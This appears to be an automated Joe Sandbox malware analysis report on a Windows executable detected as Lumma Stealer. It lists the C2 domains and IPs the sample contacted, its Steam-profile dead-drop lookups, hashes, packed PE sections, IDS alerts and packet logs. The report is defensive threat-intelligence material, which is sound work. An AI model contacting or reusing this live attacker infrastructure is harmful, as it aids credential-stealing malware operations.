http://store.steampowered.com/privacy_agreement/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/points/shop/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.steamstatic.com/public/javascript/applications/community/main.js?v=4XouecKy8sZy&am	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.steamstatic.com/public/shared/javascript/shared_global.js?v=7glT1n_nkVCs&l=eng	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068820165.0000000001238000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068820165.0000000001238000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/shared/css/shared_global.css?v=uF6G1wyNU-4c&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/privacy_agreement/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://studennotediw.store/api	file.exe, 00000000.00000003.2068820165.0000000001251000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.cloudflare.com/5xx-error-landing	file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076794436.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075795621.000000000127F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=jq1jQyX1843y&l=english	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&l=engl	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.cloudflare.com/learning/access-management/phishing-attackH	file.exe, 00000000.00000003.2076794436.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075795621.000000000127F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068820165.0000000001238000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/a	file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunf	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/U	file.exe, 00000000.00000003.2075795621.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076843236.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082296460.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR9MtmbWSZEp&l=engli	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/account/cookiepreferences/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900=	file.exe, 00000000.00000003.2068820165.0000000001251000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/mobile	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082066157.000000000127F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075795621.000000000127F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/about/	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/badges	file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068820165.0000000001238000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.199.218.33	steamcommunity.com	United States		16625	AKAMAI-ASUS	true
172.67.206.204	sergei-esenin.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1538415
Start date and time:	2024-10-21 09:05:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@10/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:05:59	API Interceptor	6x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
23.199.218.33	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	KByiiYyiam.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	l6E.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	https://sveamccommnumnlry.com/two/active/friend/put	Get hash	malicious	Unknown	Browse
172.67.206.204	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	SentinelOculus.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sergei-esenin.com	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
steamcommunity.com	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	rIMG465244247443GULFORDEROpmagasinering.cmd	Get hash	malicious	Remcos, GuLoader	Browse	172.67.155.139
	Documenti di spedizione.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.53.8
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	https://cambridge.pl/testy-poziomujace	Get hash	malicious	Unknown	Browse	104.22.58.91
	http://sustainability-bunnings.com	Get hash	malicious	Unknown	Browse	104.18.43.2
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.206.204
	https://app.creatopy.com/share/d/qvnqyxdo8o7m	Get hash	malicious	Unknown	Browse	104.17.223.152
AKAMAI-ASUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.102.49.254
	bin.armv7l.elf	Get hash	malicious	Mirai	Browse	104.115.251.102
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	23.199.218.33 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	23.199.218.33 172.67.206.204
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	23.199.218.33 172.67.206.204
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	23.199.218.33 172.67.206.204
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	23.199.218.33 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	23.199.218.33 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	23.199.218.33 172.67.206.204
	SecuriteInfo.com.Win64.MalwareX-gen.31663.10814.exe	Get hash	malicious	Unknown	Browse	23.199.218.33 172.67.206.204
	SecuriteInfo.com.Win64.MalwareX-gen.27133.15456.exe	Get hash	malicious	Unknown	Browse	23.199.218.33 172.67.206.204
	SecuriteInfo.com.Win64.MalwareX-gen.11163.24254.exe	Get hash	malicious	Unknown	Browse	23.199.218.33 172.67.206.204

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.510496635287002
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'947'584 bytes
MD5:	7f65bd0a030aaf1f091fccbc602a321c
SHA1:	e7e097136bef14003a233dd3b67a5b25929b7abd
SHA256:	ab9b3c2e96eb0eb2eea2018eba01011fdfbb4e38cb1c0e87b799705fa7098d5c
SHA512:	b533781bd5c869749147e46aac4b38332c0f54a800f51da12406e109e3dd1845a8e7053a10ffda1a251e44a7eeeb725ea317174f209924c197a2ac05708e1fea
SSDEEP:	49152:2VOQfh6sRzF4LpUSxTR4u77jcb0Rz2IIKs4oNbkgILbh:20gRzFkpUSxTv7X+SAKs4bgI
TLSH:	64D54B92F585B6CFD48E77788827CD82597E0AF9071084C79DAC68BA6DB7CC112B5C38
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................0...........@...........................0.....5.-...@.................................W...k..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x708000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FD25CBDFC0Ah
psubusb mm5, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FD25CBE1C05h
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax+00h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5f057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5f1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x5d000	0x25e00	50c9419958285794d925d7d913389eac	False	0.9994520936468647	data	7.978101098832514	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5e000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5f000	0x1000	0x200	fe72def8b74193a84232a780098a7ce0	False	0.150390625	data	1.04205214219471	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rhbukrgs	0x60000	0x2a7000	0x2a6400	37209c400967c97b083cd749b41cb3ec	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bntwepgy	0x307000	0x1000	0x400	8fc680c27f8c661359073f01b1cca010	False	0.8046875	zlib compressed data	6.278368522771825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x308000	0x3000	0x2200	72cc1940d3c0a9d1a26b8bdb39f299ed	False	0.04917279411764706	DOS executable (COM)	0.4602761325652653	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-21T09:06:00.411693+0200	2056471	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)	1	192.168.2.5	63283	1.1.1.1	53	UDP
2024-10-21T09:06:00.424694+0200	2056485	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)	1	192.168.2.5	61400	1.1.1.1	53	UDP
2024-10-21T09:06:00.434980+0200	2056483	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)	1	192.168.2.5	56914	1.1.1.1	53	UDP
2024-10-21T09:06:00.467683+0200	2056481	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)	1	192.168.2.5	58291	1.1.1.1	53	UDP
2024-10-21T09:06:00.487215+0200	2056479	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)	1	192.168.2.5	63129	1.1.1.1	53	UDP
2024-10-21T09:06:00.499329+0200	2056477	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)	1	192.168.2.5	54921	1.1.1.1	53	UDP
2024-10-21T09:06:00.511159+0200	2056475	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)	1	192.168.2.5	59805	1.1.1.1	53	UDP
2024-10-21T09:06:00.522527+0200	2056473	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)	1	192.168.2.5	49842	1.1.1.1	53	UDP
2024-10-21T09:06:02.569079+0200	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49704	23.199.218.33	443	TCP
2024-10-21T09:06:03.685458+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49705	172.67.206.204	443	TCP
2024-10-21T09:06:03.685458+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	172.67.206.204	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 21, 2024 09:06:00.548712969 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:00.548743963 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:00.548872948 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:00.550136089 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:00.550153971 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:01.452327013 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:01.452497959 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:01.455887079 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:01.455898046 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:01.456403971 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:01.499195099 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:01.749197006 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:01.791413069 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.569282055 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.569339991 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.569402933 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.569428921 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.569477081 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.569503069 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.569503069 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.569514036 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.569524050 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.569534063 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.569545984 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.569576025 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.588502884 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.588574886 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.588598013 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.588677883 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.588723898 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.892110109 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.892139912 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.892179012 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.892194033 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.892235994 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.892245054 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.892277956 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.892329931 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.892378092 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.894068003 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.894083977 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.894100904 CEST	49704	443	192.168.2.5	23.199.218.33
Oct 21, 2024 09:06:02.894105911 CEST	443	49704	23.199.218.33	192.168.2.5
Oct 21, 2024 09:06:02.912230968 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:02.912343025 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:02.912436008 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:02.912775993 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:02.912827969 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.542083979 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.542350054 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:03.547754049 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:03.547790051 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.548259020 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.549669027 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:03.549710989 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:03.549783945 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.685910940 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.686029911 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.686113119 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.686230898 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:03.686259031 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.686321020 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:03.686979055 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.687434912 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.687504053 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:03.687567949 CEST	49705	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:03.687594891 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.687619925 CEST	49705	443	192.168.2.5	172.67.206.204
